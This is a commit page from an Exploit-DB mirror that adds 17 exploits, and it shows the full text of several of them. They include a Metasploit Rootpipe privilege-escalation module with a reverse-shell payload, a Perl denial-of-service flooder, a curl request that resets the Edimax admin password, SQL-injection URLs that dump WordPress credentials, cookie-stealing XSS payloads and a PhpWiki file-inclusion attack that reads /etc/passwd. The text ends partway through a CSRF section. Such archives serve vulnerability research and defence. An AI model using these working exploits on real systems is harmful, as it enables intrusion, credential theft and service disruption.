bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-09-01

Browse source 
17 new exploits
This commit is contained in:
Offensive Security 2015-09-01 05:02:37 +00:00
parent b0a05de4d0
commit 270dc872cf
18 changed files with 942 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
files.csv
View file

@ -34315,6 +34315,7 @@ id,file,description,date,author,platform,type,port
37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0
38006,platforms/php/webapps/38006.txt,"bloofoxCMS 0.3.5 Multiple Cross Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0
@ -34324,6 +34325,7 @@ id,file,description,date,author,platform,type,port
38010,platforms/php/webapps/38010.txt,"VeriCentre Multiple SQL Injection Vulnerabilities",2012-11-06,"Cory Eubanks",php,webapps,0
38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection Vulnerability",2012-11-07,"High-Tech Bridge",php,webapps,0
38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0
38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22
38015,platforms/php/webapps/38015.txt,"AR Web Content Manager (AWCM) cookie_gen.php Arbitrary Cookie Generation Weakness",2012-11-08,"Sooel Son",php,webapps,0
38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server 'where' Form Field SQL Injection Vulnerability",2012-11-09,anonymous,multiple,webapps,0
@ -34331,3 +34333,18 @@ id,file,description,date,author,platform,type,port
38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin 'cid' Parameter SQL Injection Vulnerability",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0
38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin 'eid' Parameter SQL Injection Vulnerability",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0
38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products Password Encryption Weakness",2012-11-13,"Roberto Paleari",hardware,remote,0
38021,platforms/multiple/dos/38021.pl,"Media Player Classic <= 1.5 (MPC) WebServer Request Handling Remote DoS",2012-11-16,X-Cisadane,multiple,dos,0
38022,platforms/php/webapps/38022.txt,"WordPress Dailyedition-mouss Theme 'id' Parameter SQL Injection Vulnerability",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0
38023,platforms/php/webapps/38023.txt,"WordPress Tagged Albums Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0
38024,platforms/php/webapps/38024.txt,"WebKit Cross Site Scripting Filter 'XSSAuditor.cpp' Security Bypass Vulnerability",2012-07-19,"Tushar Dalvi",php,webapps,0
38025,platforms/php/webapps/38025.txt,"Omni-Secure 'dir' Parameter Multiple File Disclosure Vulnerabilities",2012-11-19,HaCkeR_EgY,php,webapps,0
38026,platforms/php/webapps/38026.txt,"Friends in War The FAQ Manager 'question' Parameter SQL Injection Vulnerability",2012-11-16,unsuprise,php,webapps,0
38027,platforms/php/webapps/38027.txt,"PhpWiki 1.5.4 - Multiple Vulnerabilities",2015-08-31,smash,php,webapps,80
38028,platforms/windows/dos/38028.pl,"PFTP Server 8.0f Lite - textfield Local SEH Buffer Overflow",2015-08-31,"Robbie Corley",windows,dos,0
38029,platforms/hardware/webapps/38029.txt,"Edimax PS-1206MF - Web Admin Auth Bypass",2015-08-31,smash,hardware,webapps,80
38030,platforms/php/webapps/38030.php,"Ganglia Web Frontend < 3.5.1 - PHP Code Execution",2015-08-31,"Andrei Costin",php,webapps,0
38031,platforms/windows/dos/38031.pl,"Microsoft Office 2007 - msxml5.dll Crash PoC",2015-08-31,"Mohammad Reza Espargham",windows,dos,0
38032,platforms/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service Vulnerability",2015-08-31,"Mohammad Reza Espargham",ios,dos,0
38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection Vulnerability",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0
38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0
38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements Rootpipe Privilege Escalation",2015-08-31,metasploit,osx,local,0

Can't render this file because it is too large.

46
platforms/hardware/webapps/38029.txt Executable file
View file

@ -0,0 +1,46 @@
# Title: Edimax PS-1206MF - Web Admin Auth Bypass
# Date: 30.08.15
# Vendor: edimax.com
# Firmware version: 4.8.25
# Author: Smash_
# Contact: smash [at] devilteam.pl
HTTP authorization is not being properly verified while sendind POST requests to .cgi, remote attacker is able to change specific settings or even reset admin password.
By default, it is necessary to know current password in order to change it, but when request will be missing POST anewpass & confpass parameters, admin password will be set to null.
devil@hell:~$ curl -gi http://192.168.0.10/
HTTP/1.1 401
Date: Sat, 21 Dec 1996 12:00:00 GMT
WWW-Authenticate: Basic realm="Default password:1234"
401 Unauthorized - User authentication is required.
Request:
POST /PrtSet.cgi HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10/pssystem.htm
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
BoxName=MFD55329&anewpass=1234&confpass=1234&PSPORTNAME1=&PSPORTNAME2=&PSPORTNAME3=&save.x=47&save.y=11
Response:
HTTP/1.1 200 OK
Date: Sat, 21 Dec 1996 12:00:00 GMT
Content-type: text/html
<html><head><title>Advance Settings</title><link rel="stylesheet" href="set.css"></head>
(...)
Following curl request will set admin account with empty password.
PoC:
devil@hell:~$ curl -XPOST --data "" -s http://192.168.0.10/PrtSet.cgi > /dev/null

48
platforms/hardware/webapps/38034.txt Executable file
View file

@ -0,0 +1,48 @@
# Exploit Title: Cyberoam : Blind SQL Injection
# Date: 31/Aug/2015
# Exploit Author: Dharmendra Kumar Singh
# Contact: dsingh63@outlook.com
# Vendor Homepage: http://www.cyberoam.com
# Software Link: http://www.cyberoam.com/NGFW/
# Version: CR500iNG-XP - 10.6.2 MR-1
# Category: Firewall
1. Description
The username field in the captive portal of Cyberoam NG firewall is vulnerable to SQL Injection and can be exploited to execute sql commands on the database.
The username field is vulnerable to the following types of SQL Injections
a) Boolean-based blind sql injection
b) Stacked queries
2. Proof of Concept
The data send to the server while logging in through the captive portal is like "mode=191&username=cyberuser&password=cyberpass&a=1439886198757&producttype=0"
The query generated in backend server must be something like this
SELECT password FROM table_name WHERE username = 'cyberuser'
a) Boolean-based blind sql injection
If a valid username/password combination is known than boolean-based blind sql injection can be done. If username is set to cyberuser' AND 'x'='x , data send will be "mode=191&username=cyberuser' AND 'x'='x&password=cyberpass&a=1439886198757&producttype=0"
And sql query will become
SELECT password FROM table_name WHERE username = 'cyberuser' AND 'x'='x'
A successfull login message will be received in response in this case. But if username is set to cyberuser' AND 'x'='y than login fail message will be received in response, since x is not equal to y, hence this confirms that username field is vulnerable to boolean-based blind sql injection
b) Stacked queries
if username is set to cyberuser';SELECT PG_SLEEP(5) -- the resultant sql query will become
SELECT password FROM table_name WHERE username = 'cyberuser';SELECT PG_SLEEP(5) -- '
The stacked sql query "SELECT PG_SLEEP(5)" will make the current sessions process sleep until 5 seconds have elapsed. This confirms that Postgresql Server is used and stacked queries can be executed by providing crafted input to username field.
3. Exploit
Since the techniques are blind hence it is recommended to use an automated tool like SQLMap to exploit the vulnerability. The following command can be used to initiate the exploit
sqlmap.py -u "http://example.com:8090/login.xml" --data "mode=191&username=cyberuser&password=cyberpass&a=1439886198757&producttype=0"
4. Solution
The backend server scripts do not sanitize user-supplied data before using it in the SQL query. Hence by properly sanitizing the data received in GET variable "username", the vulnerability can be patched.
5. Conclusion
The Cyberoam NG Firewall devices <= Version: CR500iNG-XP - 10.6.2 MR-1 are vulnerable to blind SQL Injection and this vulnerability can be exploited by an attacker to compromise the application, access or modify data

59
platforms/ios/dos/38032.pl Executable file
View file

@ -0,0 +1,59 @@
#!/usr/bin/perl -w
#-*- coding: utf-8 -*
#
#[+] Title: Viber Non-Printable Characters Handling Denial of Service Vulnerability
#[+] Product: Viber
#[+] Vendor: http://www.viber.com/en/
#[+] SoftWare Link : https://itunes.apple.com/app/viber-free-phone-calls/id382617920?mt=8
#[+] Vulnerable Version(s): Viber 4.2.0 on IOS 7.1.2
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#Source : http://www.securityfocus.com/bid/75217/info
# 1.run perl code
# 2.Copy the perl output text
# 3.Open Viber Desktop
# 4.Select Your VICTIM
# 5.Paste and Message
# 6.Enjoy
use open ':std', ':encoding(UTF-8)';
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
use MIME::Base64;
$ut="M7tktuYbL14T";
$utd = decode_base64($ut);
$lt="sNiw2KAg2KAg2Ao=";
$ltd = decode_base64($lt);
$bt="M7tktuYbL14T";
$btd = decode_base64($bt);
$junk="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9".
"Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9".
"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9".
"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9".
"Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9".
"Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9".
"Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9".
"Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9".
"Aq0Aq1Aq2Aq3Aq4Aq5Aq";
$tt="\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05";
$buffer = "A"x153; # 100xA
$buffer1 = "A"x63; #5xA
print "\n\n$utd$buffer$ltd$tt$buffer1$junk$btd\n\n";
#END <3

65
platforms/multiple/dos/38021.pl Executable file
View file

@ -0,0 +1,65 @@
source: http://www.securityfocus.com/bid/56567/info
Media Player Classic WebServer is prone to a cross-site scripting vulnerability and a denial-of-service vulnerability.
An attacker may leverage these issues to cause a denial-of-service condition or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Successfully exploiting the cross-site scripting issue may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
#!/usr/bin/perl
use IO::Socket::INET;
use Getopt::Std;
use Socket;
my $SOCKET = "";
$loop = 1000;
$ip = $ARGV[0];
$port = $ARGV[1];
if (! defined $ARGV[0])
{
print "\t*=============================================================*\n";
print "\t* --- MPC WebServer Remote Denial Of Service ---*\n";
print "\t* --- By : X-Cisadane ---*\n";
print "\t* --- ------------------------------------------------ ---*\n";
print "\t* --- Usage : perl exploitmpc.pl ( Victim IP ) ( Port ) ---*\n";
print "\t* --- ---*\n";
print "\t*=============================================================*\n";
print "\n";
print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n";
print "Default Port for MPC Web Server is 13579\n";
exit;
}
print "\t*=============================================================*\n";
print "\t* --- MPC WebServer Remote Denial Of Service ---*\n";
print "\t* --- By : X-Cisadane ---*\n";
print "\t* --- ------------------------------------------------ ---*\n";
print "\t* --- Usage : perl exploitmpc.pl ( Victim IP ) ( Port ) ---*\n";
print "\t* --- ---*\n";
print "\t*=============================================================*\n";
print "\n";
print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n";
print "Default Port for MPC Web Server is 13579\n";
print "\n";
print " Please Wait Till The Buffer is Done\n";
my $b1 = "\x41" x 100000000;
$iaddr = inet_aton($ip) || die "Unknown host: $ip\n";
$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
$proto = getprotobyname('tcp') || die "getprotobyname: $!\n";
print "\n";
print " Attacking the Target, Please Wait Till Pwned \n";
for ($j=1;$j<$loop;$j++) {
socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!\n";
connect(SOCKET,$paddr) || die "Connection Failed: $! .........Disconnected!\n";
$DoS=IO::Socket::INET->new("$ip:$port") or die;
send(SOCKET,$b1, 0) || die "failure sent: $!\n";
print $DoS "stor $b1\n";
print $DoS "QUIT\n";
close $DoS;
close SOCKET;
}
# exit :

161
platforms/osx/local/38036.rb Executable file
View file

@ -0,0 +1,161 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::OSX::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple OS X Entitlements Rootpipe Privilege Escalation',
'Description' => %q{
This module exploits the rootpipe vulnerability and bypasses Apple's initial
fix for the issue by injecting code into a process with the 'admin.writeconfig'
entitlement.
},
'Author' => [
'Emil Kvarnhammar', # Vulnerability discovery and PoC
'joev' # Copy/paste monkey
],
'References' => [
['CVE', '2015-3673'],
['URL', 'https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again/']
],
'DisclosureDate' => 'Jul 1 2015',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86_64,
'SessionTypes' => ['shell'],
'Privileged' => true,
'Targets' => [
['Mac OS X 10.9-10.10.3', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'osx/x64/shell_reverse_tcp',
'PrependSetreuid' => true
}
))
register_options([
OptString.new('WRITABLEDIR', [true, 'Writable directory', '/.Trashes'])
])
end
def check
if ver? && admin?
vprint_status("Version is between 10.9 and 10.10.3, and is admin.")
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def exploit
print_status("Copying Directory Utility.app to #{new_app}")
cmd_exec("cp -R '/System/Library/CoreServices/Applications/Directory Utility.app' '#{new_app}'")
cmd_exec("mkdir -p '#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS'")
print_status("Writing bundle plist to `#{plist_file}'")
write_file(plist_file, plist)
print_status("Writing payload to `#{payload_file}'")
write_file(payload_file, binary_payload)
register_file_for_cleanup(payload_file)
print_status("Writing malicious shared library to `#{exploit_file}'")
write_file(exploit_file, plugin_exploit)
print_status("Running Directory Utility.app")
cmd_exec("/bin/sh -c 'PAYLOAD_IN="+payload_file+" PAYLOAD_OUT="+root_file+" #{new_app}/Contents/MacOS/Directory\\ Utility'")
print_status("Deleting Directory Utility.app")
cmd_exec('rm -Rf "#{new_app}"')
print_status('Executing payload...')
cmd_exec("/bin/sh -c '#{root_file} &'")
end
def ver?
Gem::Version.new(get_sysinfo['ProductVersion']).between?(
Gem::Version.new('10.9'), Gem::Version.new('10.10.3')
)
end
def admin?
cmd_exec('groups | grep -wq admin && echo true') == 'true'
end
def sploit
"#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}"
end
def plugin_exploit
File.read(File.join(
Msf::Config.data_directory, 'exploits', 'CVE-2015-3673', 'exploit.daplug'
))
end
def binary_payload
Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
end
def exploit_file
"#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS/RootpipeBundle"
end
def plist_file
"#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/Info.plist"
end
def new_app
@app ||= "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}.app"
end
def plist
%Q|
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
<key>CFBundleGetInfoString</key>
<string>RootpipeBundle</string>
<key>CFBundleExecutable</key>
<string>RootpipeBundle</string>
<key>CFBundleIdentifier</key>
<string>com.root.pipe</string>
<key>CFBundleName</key>
<string>RootpipeBundle</string>
<key>CFBundleShortVersionString</key>
<string>0.01</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>IFMajorVersion</key>
<integer>0</integer>
<key>IFMinorVersion</key>
<integer>1</integer>
</dict>
</plist>
|
end
def payload_file
@payload_file ||=
"#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}"
end
def root_file
@root_file ||=
"#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}"
end
end

7
platforms/php/webapps/38022.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56568/info
The Dailyedition-mouss theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=-78+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28user_login,user_pass%29,14,15,16,17,18,19,20+from+wp_users--

7
platforms/php/webapps/38023.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56569/info
The Tagged Albums plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/taggedalbums/image.php?id=[sql]

17
platforms/php/webapps/38024.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/56570/info
WebKit is prone to a security-bypass vulnerability.
An attacker can exploit this vulnerability to bypass the cross-site scripting filter mechanism. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials.
Code in test.jsp:
<title>Test Page</title>
<script>
var foo = "<%= request.getParameter("foo") %>";
document.write("<text>Welcome "+ foo + "</text>");
</script>
Example URI:
http://www.domain.com/test.jsp?foo=2"; alert(document.cookie); var a="1

11
platforms/php/webapps/38025.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/56575/info
Omni-Secure is prone to multiple file-disclosure vulnerabilities.
An attacker can exploit these issues to view local files in the context of the web server process. This may aid in further attacks.
Versions Omni-Secure 5, 6 and 7 are vulnerable.
http://www.example.co/mpath/lib/browsefiles.php?dir=/
http://www.example.co/mpath/lib/browsefolders.php?dir=/

7
platforms/php/webapps/38026.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56576/info
Friends in War The FAQ Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[path]/view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5--

200
platforms/php/webapps/38027.txt Executable file
View file

@ -0,0 +1,200 @@
# Title: phpwiki 1.5.4 - Cross Site Scripting / Local File Inclusion
# Date: 29.08.15
# Vendor: sourceforge.net/projects/phpwiki/
# Affected versions: => 1.5.4 (current)
# Tested on: Apache2.2 / PHP5 / Deb32
# Author: Smash_
# Contact: smash [at] devilteam.pl
1/ Cross Site Scripting
Cross-site scripting vulnerability in user preferences allows remote unauthenticated users to inject arbitrary web script by injecting code via GET or POST 'pagename' parameter.
Example url:
http://192.168.0.10/phpwiki/index.php?pagename=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C!--
Example request:
POST /phpwiki/index.php/UserPreferences HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: folder_p-tbx=Open; PHPSESSID=3ko4uprjgmnjtmfkes3dnh0gk4; PhpWiki_WIKI_ID=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 260
pref%5Bemail%5D=&pref%5BnotifyPages%5D=&pref%5Btheme%5D=&pref%5Blang%5D=&pref%5BeditHeight%5D=22&pref%5BeditWidth%5D=80&pref%5BtimeOffset%5D=0&pagename=UserPreferencesabc%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--&action=browse
Example response:
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 21:30:47 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Vary: Accept-Encoding
Content-Length: 16114
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
(...)
<script type="text/javascript">
<!--//
var rateit_imgsrc = '/phpwiki/themes/wikilens/images/RateIt';
var rateit_action = 'RateIt';
// --></script>
<script type="text/javascript">
<!--//
var data_path = '/phpwiki';
var pagename = 'UserPreferencesabc</script><script>alert(document.cookie)</script><!--';
var script_url= '/phpwiki/index.php';
var stylepath = data_path+'/themes/Sidebar/';
var folderArrowPath = '/phpwiki/themes/default/images';
var use_path_info = true;
// --></script>
</head>
(...)
2/ Local File Inclusion
Directory traversal vulnerability in file load section allows authenticated attackers to read arbitrary files via POST or GET 'source' parameter. Content of file will be later available in created page.
Example url:
http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration?action=loadfile&overwrite=1&source=/etc/group
#1 - Example request:
POST /phpwiki/index.php/PhpWikiAdministration HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration
Cookie: folder_p-tbx=Open; folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
action=loadfile&overwrite=&pagename=PhpWikiAdministration&source=/etc/passwd
#1 - Example response:
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 22:09:36 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3534
(...)
<a id="contentTop"></a>
<h1 class="firstHeading">Loading “/etc/passwd”</h1>
<div id="bodyContent">
<em><a href="passwd" class="wiki">passwd</a></em><span> from “plain file /etc/passwd” content is identical to current version 1 - no new revision created</span><p><strong>Complete.</strong></p>
<p>Return to <a href="PhpWikiAdministration" class="wiki">PhpWikiAdministration</a></p>
(...)
#2 - Example request:
GET /phpwiki/index.php/passwd HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration
Cookie: folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625
Connection: keep-alive
#2 - Example response:
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 22:10:34 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
ETag: W/"97df6cb9b2668497eb1a804ab9c18eb8"
Last-Modified: Sat, 29 Aug 2015 22:09:55 GMT
Cache-Control: must-revalidate
Expires: Sat, 29 Aug 2015 22:10:14 GMT
Vary: Cookie
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 22599
(...)
<div class="wikitext"><p>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
<a href="news:x:9:9:news:/var/spool/news:/bin/sh" target="_blank" class="namedurl"><span style="white-space: nowrap"><img src="/phpwiki/themes/Sidebar/images/url.png" alt="" class="linkicon" />news:x:9:9:news:/var/spool/news:/bin/sh</span></a>
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server<sub>,:/nonexistent:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
colord:x:103:107:colord colour management daemon</sub>,:/var/lib/colord:/bin/false
usbmux:x:104:46:usbmux daemon<sub>,:/home/usbmux:/bin/false
miredo:x:105:65534::/var/run/miredo:/bin/false
ntp:x:106:113::/home/ntp:/bin/false
Debian-exim:x:107:114::/var/spool/exim4:/bin/false
arpwatch:x:108:117:ARP Watcher</sub>,:/var/lib/arpwatch:/bin/sh
avahi:x:109:118:Avahi mDNS daemon<sub>,:/var/run/avahi-daemon:/bin/false
beef-xss:x:110:119::/var/lib/beef-xss:/bin/false
dradis:x:111:121::/var/lib/dradis:/bin/false
pulse:x:112:122:<span style="text-decoration: underline" class="wikiunknown"><span>PulseAudio</span><a href="PulseAudio?action=create" title="Create: PulseAudio" onmouseover="window.status="Create: PulseAudio"; return true;" onmouseout="window.status='';return true;" rel="nofollow">?</a></span> daemon</sub>,:/var/run/pulse:/bin/false
speech-dispatcher:x:113:29:Speech Dispatcher<sub>,:/var/run/speech-dispatcher:/bin/sh
haldaemon:x:114:124:Hardware abstraction layer</sub>,:/var/run/hald:/bin/false
iodine:x:115:65534::/var/run/iodine:/bin/false
postgres:x:116:127:PostgreSQL administrator<sub>,:/var/lib/postgresql:/bin/bash
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
redsocks:x:118:128::/var/run/redsocks:/bin/false
snmp:x:119:129::/var/lib/snmp:/bin/false
stunnel4:x:120:130::/var/run/stunnel4:/bin/false
statd:x:121:65534::/var/lib/nfs:/bin/false
sslh:x:122:133::/nonexistent:/bin/false
Debian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false
rtkit:x:124:136:<span style="text-decoration: underline" class="wikiunknown"><span>RealtimeKit</span><a href="RealtimeKit?action=create" title="Create: RealtimeKit" onmouseover="window.status="Create: RealtimeKit"; return true;" onmouseout="window.status='';return true;" rel="nofollow">?</a></span></sub>,:/proc:/bin/false
saned:x:125:137::/home/saned:/bin/false
devil:x:1000:1001:devil<sub>,:/home/devil:/bin/bash
debian-tor:x:126:138::/var/lib/tor:/bin/false
privoxy:x:127:65534::/etc/privoxy:/bin/false
redis:x:128:139:redis server</sub>,:/var/lib/redis:/bin/false</p>
</div>
(...)
3/ Cross Site Request Forgery
Since there is no csrf protection in application, remote attacker is able to trigger specific actions.
PoC:
<html>
<!-- Change settings / XSS -->
<body>
